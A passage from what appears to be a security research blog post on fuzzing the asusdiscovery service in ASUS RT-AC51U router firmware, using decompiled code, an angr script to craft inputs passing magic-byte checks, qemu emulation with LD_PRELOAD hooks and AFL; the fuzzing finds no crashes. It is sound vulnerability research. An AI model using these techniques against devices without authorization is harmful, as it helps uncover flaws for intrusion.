    iVar39 = a_GetRouterCount;

    This function first checks for a set of magic bytes before continueing. It's looking for "\x0c\x16\x00\x1f" to be the first bytes in network input. Without these magic bytes it will exit early and indicate through it's return code to discard the input.

     
    
     
    int UnpackGetInfo_NEW(char *user_input,undefined4 *param_2,undefined4 *param_3)
    {
    undefined4 uVar1;
    undefined4 uVar2;
    undefined4 uVar3;
    undefined4 *puVar4;
    undefined4 *puVar5;
    undefined4 *puVar6;
     
    if (((*user_input != '\f') || (user_input[1] != 0x16)) || (*(short *)(user_input + 2) != 0x1f)) {
    return 1;
    }

    Supplying this magic value immediatly returns a different result when running the binary:

     
    
     
    $ python2 -c 'print "\x0c\x16\x1f\x00" + "A"*100' | qemu-mipsel -L . -E LD_PRELOAD=/lib/libdl.so.0:/main_hook.so ./usr/sbin/asusdiscovery
    Ret val 1

    The function returns more than just a single return value based on the parse or unpack. There appears to be checks on lines 12, 15, 32, 33 and returns a result based on the input on line 50.

     
    
     
    int UnpackGetInfo_NEW(char *user_input,undefined4 *param_2,undefined4 *param_3)
    {
    undefined4 uVar1;
    undefined4 uVar2;
    undefined4 uVar3;
    undefined4 *puVar4;
    undefined4 *puVar5;
    undefined4 *puVar6;
     
    if (((*user_input != '\f') || (user_input[1] != 0x16)) || (*(short *)(user_input + 2) != 0x1f)) {
    return 1;
    }
    puVar6 = (undefined4 *)(user_input + 8);
    do {
    puVar5 = puVar6;
    puVar4 = param_2;
    uVar1 = puVar5[1];
    uVar2 = puVar5[2];
    uVar3 = puVar5[3];
    *puVar4 = *puVar5;
    puVar4[1] = uVar1;
    puVar4[2] = uVar2;
    puVar6 = puVar5 + 4;
    puVar4[3] = uVar3;
    param_2 = puVar4 + 4;
    } while (puVar6 != (undefined4 *)(user_input + 0xf8));
    uVar1 = puVar5[5];
    puVar4[4] = *puVar6;
    puVar4[5] = uVar1;
    if ((*(short *)(user_input + 0x110) == -0x7f7e) &&
    (puVar6 = (undefined4 *)(user_input + 0x110), (user_input[0x112] & 1U) != 0)) {
    do {
    puVar5 = puVar6;
    puVar4 = param_3;
    uVar1 = puVar5[1];
    uVar2 = puVar5[2];
    uVar3 = puVar5[3];
    *puVar4 = *puVar5;
    puVar4[1] = uVar1;
    puVar4[2] = uVar2;
    puVar6 = puVar5 + 4;
    puVar4[3] = uVar3;
    param_3 = puVar4 + 4;
    } while (puVar6 != (undefined4 *)(user_input + 0x1d0));
    uVar1 = puVar5[5];
    puVar4[4] = *puVar6;
    puVar4[5] = uVar1;
    return (uint)((user_input[0x112] & 0x10U) != 0) + 5;
    }
    return 0;
    }

    This is a perfect time to breakout angr to create a valid input to hit line 50! The following code will create a 300 byte symbolic buffer and have angr solve the constraints required to pass each check in the unpacking function to yield all potential return results. We are intersted in the analysis path that reached the furthest part of the parsing function. The script below will print out each path end address and the required input to reach that path.

     
    
     
    import angr
    import angr.sim_options as so
    import claripy
    symbol = "UnpackGetInfo_NEW"
    # Create a project with history tracking
    p = angr.Project('/home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root/usr/sbin/asusdiscovery')
    extras = {so.REVERSE_MEMORY_NAME_MAP, so.TRACK_ACTION_HISTORY}
    # User input will be 300 symbolic bytes
    user_arg = claripy.BVS("user_arg", 300*8)
    # State starts at function address
    start_addr = p.loader.find_symbol(symbol).rebased_addr
    state = p.factory.blank_state(addr=start_addr, add_options=extras)
    # Store symbolic user_input buffer
    state.memory.store(0x100000, user_arg)
    state.regs.a0 = 0x100000
    # Run to exhaustion
    simgr = p.factory.simgr(state)
    simgr.explore()
    # Print each path and the inputs required
    for path in simgr.unconstrained:
    print("{} : {}".format(path,hex([x for x in path.history.bbl_addrs][-1])))
    u_input = path.solver.eval(user_arg, cast_to=bytes)
    print(u_input)

    One of the outputs is shown below, and this input can then be sent back into the program through the above qemu command to validate that it passes the checks.

     
    
     
    <SimState @ <BV32 reg_ra_51_32{UNINITIALIZED}>> : 0x401c4c
    b'\x0c\x16\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x80\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
    ### Running the input
    $ printf '\x0c\x16\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x80\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | qemu-mipsel -L . -E LD_PRELOAD=/lib/libdl.so.0:/main_hook.so ./usr/sbin/asusdiscovery
    Ret val 1

    I've put each of these inputs into individual files for AFL to read from later.

     
    
     
    $ ls afl_input/
    test_case1 test_case2 test_case3 test_case4 test_case5

     

    Fuzzing the function

    Using the AFL build process outlined here will provide AFL with qemu mode which will fuzz asusdiscovery with the script:

     
    
     
    #!/bin/bash
    export "QEMU_SET_ENV=LD_PRELOAD=/lib/libdl.so.0:/main_hook.so"
    export "QEMU_LD_PREFIX=/home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root"
    export "AFL_INST_LIBS=1"
    #export "AFL_NO_FORKSRV=1"
    BINARY="/home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root/usr/sbin/asusdiscovery"
    afl-fuzz -i afl_input -o output -m none -Q $BINARY

    You will get some incredibly slow fuzzing at about 1-2 execution per second. The afl fork server is taking way to long to spawn off newly forked processes.

    assets%2F-LWRAm7V9PvgumFt5f6A%2F-LchYczxdoQD0c5HRBRG%2F-Lcha8OXAOuBjgVce7_M%2F2019-04-17-191843_731x455_scrot.png?alt=media&token=c816f24f-b8b4-435f-aef4-e75ead63b5d6
     

    Adding the AFL_NO_FORKSRV=1 will prevent AFL from creating a forkserver just before main and forking off new processes. For this type of hooking and emulation it runs much faster at about 85 executions per second:

    assets%2F-LWRAm7V9PvgumFt5f6A%2F-LchYczxdoQD0c5HRBRG%2F-Lchau8SKFgKs4_19UFE%2F2019-04-17-192046_742x459_scrot.png?alt=media&token=22f0289a-5550-4055-adda-32fb3814a167
     

    We can do better... Specifically we can use Abiondo's fork of AFL that he describes his blog post here. Abiondo implemented an idea for QEMU that is quoted at speeding up the qemu emulation speed on a scale of 3 to 4 times. That should put us at 300 or 400 executions per second.

    My idea was to move the instrumentation into the translated code by injecting a snippet of TCG IR at the beginning of every TB. This way, the instrumentation becomes part of the emulated program, so we don’t need to go back into the emulator at every block, and we can re-enable chaining.

    Downloading and running the fork of AFL follows the exact same build process:

     
    
     
    cd afl
    make
    cd qemu_mode
    export CPU_TARGET=mipsel
    ./build_qemu_support.sh

    Rerunning the previous fuzzing command script WITHOUT the AFL_NO_FORKSRV environment variable produces some absolutely insane results:

    assets%2F-LWRAm7V9PvgumFt5f6A%2F-LchYczxdoQD0c5HRBRG%2F-LchdbgRdB4VFsTQsyZ7%2F2019-04-17-193313_774x495_scrot.png?alt=media&token=7109844d-2839-4b63-a433-9115350a3236
     

     

    Final fuzzing results

    After about 24 hours of fuzzing, hardly any new paths were discovered. Doing some more static analysis on the parsing functions revealed very few spots in the functions for any potentially dangerous user input to corrupt anything.

     
    
     
    $ cat output_fast/fuzzer_stats
    start_time : 1555381507
    last_update : 1555385229
    fuzzer_pid : 61241
    cycles_done : 272
    execs_done : 8226287
    execs_per_sec : 2055.33
    paths_total : 85
    paths_favored : 19
    paths_found : 81
    paths_imported : 0
    max_depth : 6
    cur_path : 49
    pending_favs : 0
    pending_total : 0
    variable_paths : 0
    stability : 100.00%
    bitmap_cvg : 1.15%
    unique_crashes : 0
    unique_hangs : 0
    last_path : 1555382334
    last_crash : 0
    last_hang : 0
    execs_since_crash : 8226287
    exec_timeout : 20
    afl_banner : asusdiscovery
    afl_version : 2.52b
    target_mode : qemu
    command_line : afl-fuzz -i afl_input -o output -m none -Q /home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root/usr/sbin/asusdiscovery

     

    Final thoughts

    Over the course of using the LD_PRELOAD trick paired with jumping directly to a function I wanted to fuzz, I was able to save tons of time inside of GDB trying to see what code paths were valid. By using Abiondo's fork of AFL I was able to get execution times on par with AFL compiling code speeds. Getting thousands of executions per second doesn't generally happen when fuzzing applications in AFL's QEMU mode and I was happy to see 2000 plus executions per second.

     

    Sursa: https://breaking-bits.gitbook.io/breaking-bits/vulnerability-discovery/reverse-engineering/modern-approaches-toward-embedded-research

×
×
  • Create New...